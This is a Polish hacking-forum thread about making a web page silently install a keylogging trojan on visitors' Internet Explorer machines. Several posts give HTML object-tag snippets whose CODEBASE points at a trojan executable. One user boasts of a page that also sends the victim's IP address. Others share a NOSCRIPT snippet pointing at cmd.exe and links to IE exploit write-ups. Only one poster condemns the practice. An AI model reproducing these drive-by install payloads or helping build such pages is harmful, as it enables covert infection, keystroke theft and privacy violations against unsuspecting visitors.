Instalowanie się trojana poprzez www -.-

[Bobercjusz]

Czytałem wszystkie posty na ten temat. Stosowałem się do wskazówek lecz po wsadzeniu stronki i trojana na serwer nic się nie dzieje. Pozatym mam XP Prof z SP2 i po otworzeniu stronki pyta się mnie czy zainstalować format activex więc to kolejne utrudnienie. Ale nawet po zatwierdzeniu nic się nie instaluje jak powinno...
Interesuje mnie aby wykonać jakąś strone wraz z plikiem swf (wiadomo: wchodze i na środku jakaś gierka czy cuś) a za plecami instaluje się trojanek.
Powinien być taki temat (przyklejony) z poradnikiem co i jak.
Proszę też o polecenie mi jakiegoś trojana małych rozmiarów (20kb or coś w tym stylu). Byle był z opcją odczytywania keyów. Najlepiej żeby działał za Natem (to z gg

). AAA i żeby się automatycznie uruchamiał po restarcie windy.
Dzieki za wyrozumiałość

proszę o szybką odpowiedź

 

[SZKOD[nick]]

Jak ktoś napisze taki poradnik to chętnie go przykleje, napisz jak masz czas...
Mały trojan? Rozwiązaniem jest downloader

 

[fl3a]

Tak fajowo bo malo tego guwna po necie! Nie trzeba wchodzic juz na strony z golymi panienkami by jakies guwno sie zechcialo przyplatac! Jak jeszcze jest to cos ambitnego i denerwujacego to mozna sie czegos nauczyc ale jak jest to zwykle scierwo to przykro sie robi. Uwazam ze takie postepowanie jest ZALOSNE i KARYGODNE. Bo nie chodzi wam o wiedze tylko o naruszanie czyjejs prywatnosci! Wsadzaja roznych ludzi do pudla a powinni zaczac od takich by dac przyklad innym. Bo tworca Vira idze do pudla a ten co z niego korzysta nie ponosi zadnej konsekwencji! I to jest podstawowy powod ktory uniemozliwia np. mi udostepniena wlasnych zrodel

 

[Guest]

Odpalenie dowolnego EXE z www proste jak maslo

wpisujesz:

<object width=0 height=0 CODEBASE="http://twoja_strona_www.pl/jakis_plik.exe" classid="CLSID:11111111-1111-1111-1111-111111111111" width=1 height=1></object>

osobiscie zrobilem stronke gdzie nie dosc ze odpala sie trojan to przesyla dodatkowo IP ofiary

tylko ze przez Cafeini nie moge sie polaczyc z ofiara ?!
why not? JAKI JEST DOBRY BACKDOOR do laczenia sie przez np.neostrade?

 

[GreEnSnake]

<object width=0 height=0 codebase="trojan.exe" classid="CLSID:A67BA5E3-5B79-11D6-A711-00C12601EAD"></object>

Tak chyba tez moze byc ;-) .

 

[Guest]

Tez moze byc

 

[Bobercjusz]

No jest to rozwiązanie ale nie po instalacji SP2 ponieważ pyta się czy zainstalować takie i takie oprogramowanie szkodliwe dla kompa. Chodziło mi raczej o coś co wykorzystuje dziurę w explorerze z service packiem 2.
Pozdrawiam

 

[GreEnSnake]

Originally posted by Bobercjusz
No jest to rozwiązanie ale nie po instalacji SP2 ponieważ pyta się czy zainstalować takie i takie oprogramowanie szkodliwe dla kompa. Chodziło mi raczej o coś co wykorzystuje dziurę w explorerze z service packiem 2.
Pozdrawiam

Robi sie szefie =] . Moze tutaj cos bedzie:
1.
http://www.haxite.org/index.php3?site=arty...view&id=292 // vol1

2.
http://www.haxite.org/index.php3?site=arty...view&id=293 // vol2

3.
http://www.haxite.org/index.php3?site=arty...view&id=298 // vol3

 

[Bobercjusz]

Dzieki, poszperam

Ostatnio szukałem registration keya do jakiegoś programu i natknąłem się na stronę

http://www.seriall.com

i po wejściu na jakąkolwiek podstronę wyskakuje info o trojanie na AV a explorer nic nie wykrył. Skrypt na tej stronce najwyraźniej wykorzystuje dziurę w zabezpieczeniach.
Jeżeli ktoś odkryje co i jak to śmiało dawać do topicu

Pozdro


~Edit!:
Przypominam o tej www :]

 

[Bobercjusz]

Odświeżam temat...


... i jednocześnie podaję skrypt który udało mi się wyciągnąć z wyżej podanej stronki:

<NOSCRIPT><a target=_blank href=http://warlog.info/cgi-bin/cshow>

</a></NOSCRIPT>


Po umieszczeniu takiego czegoś na www explorer nic nie mówi o instalowaniu się jakiegoś pliku tylko AV informuje nas o trojanie.

Jeżeli komuś uda się rozgryźć jak należy "spreparować" ten skrypcik aby instalował się nasz trojanek, to będzie konkretnie

 

[GreEnSnake]

Linki do innych bugow w IE:

http://www.cc-team.org/index.php?name=bugtraq&show=96
http://www.cc-team.org/index.php?name=bugtraq&show=4
http://www.cc-team.org/index.php?name=bugtraq&show=111
http://www.cc-team.org/index.php?name=bugtraq&show=153
http://www.cc-team.org/index.php?name=bugtraq&show=180
http://www.cc-team.org/index.php?name=bugtraq&show=216
http://www.cc-team.org/index.php?name=bugtraq&show=270
http://www.cc-team.org/index.php?name=bugtraq&show=276
http://www.cc-team.org/index.php?name=bugtraq&show=284
http://www.cc-team.org/index.php?name=bugtraq&show=341
http://www.cc-team.org/index.php?name=bugtraq&show=650
http://www.cc-team.org/index.php?name=bugtraq&show=802
http://www.cc-team.org/index.php?name=bugtraq&show=803
http://hacking.pl/5175
http://hacking.pl/5125

 

[szymonz9]

To ja mam coś innego :> . Włączcie jakiegoś dobrego Antyvirusa (najlepiej Kaspersky). I odpalcie stronkę www.serials.ws ... jak oni to robią ^.- ??

 

[NiuNio]

wystarczy firewall i nic nie zrobia nawet popup nie wyskoczy ;]

 

[dyziek4]

<object width=0 height=0 CODEBASE="1.exe" classid="CLSID:11111111-1111-1111-1111-111111111111" width=1 height=1></object>

wie ktś może jak to przerobić tak żeby przy każdym otwarciu strony wysłał sie kolejny serwer np. 1.exe, 2.exe, 3.exe ....

kiedyś widziałem taki temat na forum ale teraz nie moge znaleźć :?

 

[GreEnSnake]

Originally posted by Bobercjusz
<NOSCRIPT><a target=_blank href=http://warlog.info/cgi-bin/cshow>

</a></NOSCRIPT>

Jeżeli komuś uda się rozgryźć jak należy "spreparować" ten skrypcik aby instalował się nasz trojanek, to będzie konkretnie

Co tu duzo mowic, np.:

<NOSCRIPT><a target=_blank href=C:WINDOWSsystem32cmd.exe>[img]C:WINDOWSsystem32cmd.exe[/img]</a></NOSCRIPT>

Niestety gdy ma sie SP2 to ten skrypt nic nie zdziala =]

 

[SaTaNiKa]

Jest sobie taki ciekawy skrypt w jawie ostatnio się na niego natknołem na pewnej stronce
tej właśnie

[code
<script type="text/jscript">
function init() {
document.write("The time is: " + Date() );

}
window.onload = init;
</script>
[/code]

Można nim conieco wykonać nawet AV nie wykryje złośliwości skrytu lecz mało znam się na jawie i prosze o pomoc jak tego użyć :?: :?: o bo t powinno sie przydać nawet działa pod SP2 Suszę zęby o ile Bil nie wypuścił łaty jeżeli by to dobrze przeobić można by było coś podinstalować dzięki temy jeśli się nie myle tylko co w tym zmienić będę wdzięczny za pomoc

 

[GreEnSnake]

Originally posted by SaTaNiKa
Jest sobie taki ciekawy skrypt w jawie ostatnio się na niego natknołem na pewnej stronce
tej właśnie

[code
<script type="text/jscript">
function init() {
document.write("The time is: " + Date() );

}
window.onload = init;
</script>
[/code]

Można nim conieco wykonać nawet AV nie wykryje złośliwości skrytu lecz mało znam się na jawie i prosze o pomoc jak tego użyć :?: :?: o bo t powinno sie przydać nawet działa pod SP2 Suszę zęby o ile Bil nie wypuścił łaty jeżeli by to dobrze przeobić można by było coś podinstalować dzięki temy jeśli się nie myle tylko co w tym zmienić będę wdzięczny za pomoc

W tym skrypcie, a dokladnie w tej czesci ktora napisales nie ma okreslonej sciezki lub strony do serwera trojana/virusa ktory sie instaluje wiec raczej nie to odpowaida za jego instalacje...

 

[SaTaNiKa]

niejestem pewien ale jeżeli człowiek by się uparł i zmienił linijke

 document.write("The time is: " + Date() );

To przecież mogło by coś z tego wyjść w każdym razie mi się tak zdaje tylko
ja nie znam jawy żeby to zmienić al to moglo by cos dać.[/code]

 

[GreEnSnake]

Zreszta ja mam SP2 i mi on to blokuje =]
Satanika na jakim systemie to sprawdzales?? =]

 

[SaTaNiKa]

Ja testowałem to na winXp profesional zwykłym i z SP2 i jakoś śmigało